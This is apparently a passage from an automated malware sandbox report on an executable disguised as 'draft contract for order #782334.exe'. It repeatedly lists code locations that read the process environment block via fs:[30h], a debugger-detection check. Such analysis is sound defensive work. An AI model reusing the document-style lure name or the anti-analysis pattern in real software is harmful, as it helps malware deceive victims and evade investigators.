                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01782349 mov eax, dword ptr fs:[00000030h]2_2_01782349
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01782349 mov eax, dword ptr fs:[00000030h]2_2_01782349
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01782349 mov eax, dword ptr fs:[00000030h]2_2_01782349
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01782349 mov eax, dword ptr fs:[00000030h]2_2_01782349
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01782349 mov eax, dword ptr fs:[00000030h]2_2_01782349
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01782349 mov eax, dword ptr fs:[00000030h]2_2_01782349
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01782349 mov eax, dword ptr fs:[00000030h]2_2_01782349
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D634F mov eax, dword ptr fs:[00000030h]2_2_017D634F
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D8324 mov eax, dword ptr fs:[00000030h]2_2_017D8324
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D8324 mov ecx, dword ptr fs:[00000030h]2_2_017D8324
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D8324 mov eax, dword ptr fs:[00000030h]2_2_017D8324
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D8324 mov eax, dword ptr fs:[00000030h]2_2_017D8324
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01720310 mov ecx, dword ptr fs:[00000030h]2_2_01720310
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173A30B mov eax, dword ptr fs:[00000030h]2_2_0173A30B
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173A30B mov eax, dword ptr fs:[00000030h]2_2_0173A30B
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173A30B mov eax, dword ptr fs:[00000030h]2_2_0173A30B
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016FC310 mov ecx, dword ptr fs:[00000030h]2_2_016FC310
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0171E3F0 mov eax, dword ptr fs:[00000030h]2_2_0171E3F0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0171E3F0 mov eax, dword ptr fs:[00000030h]2_2_0171E3F0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0171E3F0 mov eax, dword ptr fs:[00000030h]2_2_0171E3F0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017363FF mov eax, dword ptr fs:[00000030h]2_2_017363FF
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017103E9 mov eax, dword ptr fs:[00000030h]2_2_017103E9
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017103E9 mov eax, dword ptr fs:[00000030h]2_2_017103E9
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017103E9 mov eax, dword ptr fs:[00000030h]2_2_017103E9
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017103E9 mov eax, dword ptr fs:[00000030h]2_2_017103E9
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017103E9 mov eax, dword ptr fs:[00000030h]2_2_017103E9
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017103E9 mov eax, dword ptr fs:[00000030h]2_2_017103E9
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017103E9 mov eax, dword ptr fs:[00000030h]2_2_017103E9
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017103E9 mov eax, dword ptr fs:[00000030h]2_2_017103E9
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017AE3DB mov eax, dword ptr fs:[00000030h]2_2_017AE3DB
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017AE3DB mov eax, dword ptr fs:[00000030h]2_2_017AE3DB
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017AE3DB mov ecx, dword ptr fs:[00000030h]2_2_017AE3DB
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017AE3DB mov eax, dword ptr fs:[00000030h]2_2_017AE3DB
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017A43D4 mov eax, dword ptr fs:[00000030h]2_2_017A43D4
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017A43D4 mov eax, dword ptr fs:[00000030h]2_2_017A43D4
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0170A3C0 mov eax, dword ptr fs:[00000030h]2_2_0170A3C0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0170A3C0 mov eax, dword ptr fs:[00000030h]2_2_0170A3C0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0170A3C0 mov eax, dword ptr fs:[00000030h]2_2_0170A3C0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0170A3C0 mov eax, dword ptr fs:[00000030h]2_2_0170A3C0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0170A3C0 mov eax, dword ptr fs:[00000030h]2_2_0170A3C0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0170A3C0 mov eax, dword ptr fs:[00000030h]2_2_0170A3C0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017083C0 mov eax, dword ptr fs:[00000030h]2_2_017083C0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017083C0 mov eax, dword ptr fs:[00000030h]2_2_017083C0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017083C0 mov eax, dword ptr fs:[00000030h]2_2_017083C0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017083C0 mov eax, dword ptr fs:[00000030h]2_2_017083C0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017BC3CD mov eax, dword ptr fs:[00000030h]2_2_017BC3CD
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017863C0 mov eax, dword ptr fs:[00000030h]2_2_017863C0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016FE388 mov eax, dword ptr fs:[00000030h]2_2_016FE388
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016FE388 mov eax, dword ptr fs:[00000030h]2_2_016FE388
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016FE388 mov eax, dword ptr fs:[00000030h]2_2_016FE388
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016F8397 mov eax, dword ptr fs:[00000030h]2_2_016F8397
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016F8397 mov eax, dword ptr fs:[00000030h]2_2_016F8397
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016F8397 mov eax, dword ptr fs:[00000030h]2_2_016F8397
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172438F mov eax, dword ptr fs:[00000030h]2_2_0172438F
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172438F mov eax, dword ptr fs:[00000030h]2_2_0172438F
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016F826B mov eax, dword ptr fs:[00000030h]2_2_016F826B
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017B0274 mov eax, dword ptr fs:[00000030h]2_2_017B0274
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017B0274 mov eax, dword ptr fs:[00000030h]2_2_017B0274
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017B0274 mov eax, dword ptr fs:[00000030h]2_2_017B0274
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017B0274 mov eax, dword ptr fs:[00000030h]2_2_017B0274
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017B0274 mov eax, dword ptr fs:[00000030h]2_2_017B0274
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017B0274 mov eax, dword ptr fs:[00000030h]2_2_017B0274
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017B0274 mov eax, dword ptr fs:[00000030h]2_2_017B0274
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017B0274 mov eax, dword ptr fs:[00000030h]2_2_017B0274
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017B0274 mov eax, dword ptr fs:[00000030h]2_2_017B0274
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017B0274 mov eax, dword ptr fs:[00000030h]2_2_017B0274
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017B0274 mov eax, dword ptr fs:[00000030h]2_2_017B0274
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017B0274 mov eax, dword ptr fs:[00000030h]2_2_017B0274
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01704260 mov eax, dword ptr fs:[00000030h]2_2_01704260
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01704260 mov eax, dword ptr fs:[00000030h]2_2_01704260
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01704260 mov eax, dword ptr fs:[00000030h]2_2_01704260
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D625D mov eax, dword ptr fs:[00000030h]2_2_017D625D
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01706259 mov eax, dword ptr fs:[00000030h]2_2_01706259
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017BA250 mov eax, dword ptr fs:[00000030h]2_2_017BA250
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017BA250 mov eax, dword ptr fs:[00000030h]2_2_017BA250
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01788243 mov eax, dword ptr fs:[00000030h]2_2_01788243
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01788243 mov ecx, dword ptr fs:[00000030h]2_2_01788243
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016FA250 mov eax, dword ptr fs:[00000030h]2_2_016FA250
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016F823B mov eax, dword ptr fs:[00000030h]2_2_016F823B
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017102E1 mov eax, dword ptr fs:[00000030h]2_2_017102E1
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017102E1 mov eax, dword ptr fs:[00000030h]2_2_017102E1
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017102E1 mov eax, dword ptr fs:[00000030h]2_2_017102E1
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D62D6 mov eax, dword ptr fs:[00000030h]2_2_017D62D6
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0170A2C3 mov eax, dword ptr fs:[00000030h]2_2_0170A2C3
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0170A2C3 mov eax, dword ptr fs:[00000030h]2_2_0170A2C3
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0170A2C3 mov eax, dword ptr fs:[00000030h]2_2_0170A2C3
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0170A2C3 mov eax, dword ptr fs:[00000030h]2_2_0170A2C3
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0170A2C3 mov eax, dword ptr fs:[00000030h]2_2_0170A2C3
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017102A0 mov eax, dword ptr fs:[00000030h]2_2_017102A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017102A0 mov eax, dword ptr fs:[00000030h]2_2_017102A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017962A0 mov eax, dword ptr fs:[00000030h]2_2_017962A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017962A0 mov ecx, dword ptr fs:[00000030h]2_2_017962A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017962A0 mov eax, dword ptr fs:[00000030h]2_2_017962A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017962A0 mov eax, dword ptr fs:[00000030h]2_2_017962A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017962A0 mov eax, dword ptr fs:[00000030h]2_2_017962A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017962A0 mov eax, dword ptr fs:[00000030h]2_2_017962A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173E284 mov eax, dword ptr fs:[00000030h]2_2_0173E284
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173E284 mov eax, dword ptr fs:[00000030h]2_2_0173E284
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01780283 mov eax, dword ptr fs:[00000030h]2_2_01780283
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01780283 mov eax, dword ptr fs:[00000030h]2_2_01780283
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01780283 mov eax, dword ptr fs:[00000030h]2_2_01780283
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173656A mov eax, dword ptr fs:[00000030h]2_2_0173656A
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173656A mov eax, dword ptr fs:[00000030h]2_2_0173656A
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173656A mov eax, dword ptr fs:[00000030h]2_2_0173656A
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01708550 mov eax, dword ptr fs:[00000030h]2_2_01708550
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01708550 mov eax, dword ptr fs:[00000030h]2_2_01708550
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01710535 mov eax, dword ptr fs:[00000030h]2_2_01710535
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01710535 mov eax, dword ptr fs:[00000030h]2_2_01710535
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01710535 mov eax, dword ptr fs:[00000030h]2_2_01710535
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01710535 mov eax, dword ptr fs:[00000030h]2_2_01710535
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01710535 mov eax, dword ptr fs:[00000030h]2_2_01710535
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01710535 mov eax, dword ptr fs:[00000030h]2_2_01710535
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172E53E mov eax, dword ptr fs:[00000030h]2_2_0172E53E
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172E53E mov eax, dword ptr fs:[00000030h]2_2_0172E53E
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172E53E mov eax, dword ptr fs:[00000030h]2_2_0172E53E
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172E53E mov eax, dword ptr fs:[00000030h]2_2_0172E53E
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172E53E mov eax, dword ptr fs:[00000030h]2_2_0172E53E
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01796500 mov eax, dword ptr fs:[00000030h]2_2_01796500
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D4500 mov eax, dword ptr fs:[00000030h]2_2_017D4500
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D4500 mov eax, dword ptr fs:[00000030h]2_2_017D4500
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D4500 mov eax, dword ptr fs:[00000030h]2_2_017D4500
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D4500 mov eax, dword ptr fs:[00000030h]2_2_017D4500
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D4500 mov eax, dword ptr fs:[00000030h]2_2_017D4500
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D4500 mov eax, dword ptr fs:[00000030h]2_2_017D4500
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D4500 mov eax, dword ptr fs:[00000030h]2_2_017D4500
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017025E0 mov eax, dword ptr fs:[00000030h]2_2_017025E0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172E5E7 mov eax, dword ptr fs:[00000030h]2_2_0172E5E7
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172E5E7 mov eax, dword ptr fs:[00000030h]2_2_0172E5E7
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172E5E7 mov eax, dword ptr fs:[00000030h]2_2_0172E5E7
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172E5E7 mov eax, dword ptr fs:[00000030h]2_2_0172E5E7
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172E5E7 mov eax, dword ptr fs:[00000030h]2_2_0172E5E7
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172E5E7 mov eax, dword ptr fs:[00000030h]2_2_0172E5E7
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172E5E7 mov eax, dword ptr fs:[00000030h]2_2_0172E5E7
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172E5E7 mov eax, dword ptr fs:[00000030h]2_2_0172E5E7
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173C5ED mov eax, dword ptr fs:[00000030h]2_2_0173C5ED
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173C5ED mov eax, dword ptr fs:[00000030h]2_2_0173C5ED
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017065D0 mov eax, dword ptr fs:[00000030h]2_2_017065D0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173A5D0 mov eax, dword ptr fs:[00000030h]2_2_0173A5D0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173A5D0 mov eax, dword ptr fs:[00000030h]2_2_0173A5D0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173E5CF mov eax, dword ptr fs:[00000030h]2_2_0173E5CF
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173E5CF mov eax, dword ptr fs:[00000030h]2_2_0173E5CF
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017245B1 mov eax, dword ptr fs:[00000030h]2_2_017245B1
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017245B1 mov eax, dword ptr fs:[00000030h]2_2_017245B1
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017805A7 mov eax, dword ptr fs:[00000030h]2_2_017805A7
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017805A7 mov eax, dword ptr fs:[00000030h]2_2_017805A7
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017805A7 mov eax, dword ptr fs:[00000030h]2_2_017805A7
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173E59C mov eax, dword ptr fs:[00000030h]2_2_0173E59C
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01702582 mov eax, dword ptr fs:[00000030h]2_2_01702582
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01702582 mov ecx, dword ptr fs:[00000030h]2_2_01702582
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01734588 mov eax, dword ptr fs:[00000030h]2_2_01734588
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172A470 mov eax, dword ptr fs:[00000030h]2_2_0172A470
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172A470 mov eax, dword ptr fs:[00000030h]2_2_0172A470
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172A470 mov eax, dword ptr fs:[00000030h]2_2_0172A470
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0178C460 mov ecx, dword ptr fs:[00000030h]2_2_0178C460
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172245A mov eax, dword ptr fs:[00000030h]2_2_0172245A
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017BA456 mov eax, dword ptr fs:[00000030h]2_2_017BA456
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173E443 mov eax, dword ptr fs:[00000030h]2_2_0173E443
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173E443 mov eax, dword ptr fs:[00000030h]2_2_0173E443
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173E443 mov eax, dword ptr fs:[00000030h]2_2_0173E443
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173E443 mov eax, dword ptr fs:[00000030h]2_2_0173E443
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173E443 mov eax, dword ptr fs:[00000030h]2_2_0173E443
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173E443 mov eax, dword ptr fs:[00000030h]2_2_0173E443
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173E443 mov eax, dword ptr fs:[00000030h]2_2_0173E443
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173E443 mov eax, dword ptr fs:[00000030h]2_2_0173E443
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016F645D mov eax, dword ptr fs:[00000030h]2_2_016F645D
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016FC427 mov eax, dword ptr fs:[00000030h]2_2_016FC427
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016FE420 mov eax, dword ptr fs:[00000030h]2_2_016FE420
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016FE420 mov eax, dword ptr fs:[00000030h]2_2_016FE420
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016FE420 mov eax, dword ptr fs:[00000030h]2_2_016FE420
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01786420 mov eax, dword ptr fs:[00000030h]2_2_01786420
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01786420 mov eax, dword ptr fs:[00000030h]2_2_01786420
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01786420 mov eax, dword ptr fs:[00000030h]2_2_01786420
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01786420 mov eax, dword ptr fs:[00000030h]2_2_01786420
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01786420 mov eax, dword ptr fs:[00000030h]2_2_01786420
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01786420 mov eax, dword ptr fs:[00000030h]2_2_01786420
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01786420 mov eax, dword ptr fs:[00000030h]2_2_01786420
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01738402 mov eax, dword ptr fs:[00000030h]2_2_01738402
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01738402 mov eax, dword ptr fs:[00000030h]2_2_01738402
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01738402 mov eax, dword ptr fs:[00000030h]2_2_01738402
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017004E5 mov ecx, dword ptr fs:[00000030h]2_2_017004E5
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017344B0 mov ecx, dword ptr fs:[00000030h]2_2_017344B0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0178A4B0 mov eax, dword ptr fs:[00000030h]2_2_0178A4B0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017064AB mov eax, dword ptr fs:[00000030h]2_2_017064AB
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017BA49A mov eax, dword ptr fs:[00000030h]2_2_017BA49A
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01708770 mov eax, dword ptr fs:[00000030h]2_2_01708770
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01710770 mov eax, dword ptr fs:[00000030h]2_2_01710770
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01710770 mov eax, dword ptr fs:[00000030h]2_2_01710770
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01710770 mov eax, dword ptr fs:[00000030h]2_2_01710770
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01710770 mov eax, dword ptr fs:[00000030h]2_2_01710770
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01710770 mov eax, dword ptr fs:[00000030h]2_2_01710770
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01710770 mov eax, dword ptr fs:[00000030h]2_2_01710770
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01710770 mov eax, dword ptr fs:[00000030h]2_2_01710770
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01710770 mov eax, dword ptr fs:[00000030h]2_2_01710770
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01710770 mov eax, dword ptr fs:[00000030h]2_2_01710770
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01710770 mov eax, dword ptr fs:[00000030h]2_2_01710770
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01710770 mov eax, dword ptr fs:[00000030h]2_2_01710770
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01710770 mov eax, dword ptr fs:[00000030h]2_2_01710770
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01700750 mov eax, dword ptr fs:[00000030h]2_2_01700750
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742750 mov eax, dword ptr fs:[00000030h]2_2_01742750
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742750 mov eax, dword ptr fs:[00000030h]2_2_01742750
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0178E75D mov eax, dword ptr fs:[00000030h]2_2_0178E75D
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01784755 mov eax, dword ptr fs:[00000030h]2_2_01784755
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173674D mov esi, dword ptr fs:[00000030h]2_2_0173674D
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173674D mov eax, dword ptr fs:[00000030h]2_2_0173674D
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173674D mov eax, dword ptr fs:[00000030h]2_2_0173674D
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0177C730 mov eax, dword ptr fs:[00000030h]2_2_0177C730
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173273C mov eax, dword ptr fs:[00000030h]2_2_0173273C
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173273C mov ecx, dword ptr fs:[00000030h]2_2_0173273C
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173273C mov eax, dword ptr fs:[00000030h]2_2_0173273C
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173C720 mov eax, dword ptr fs:[00000030h]2_2_0173C720
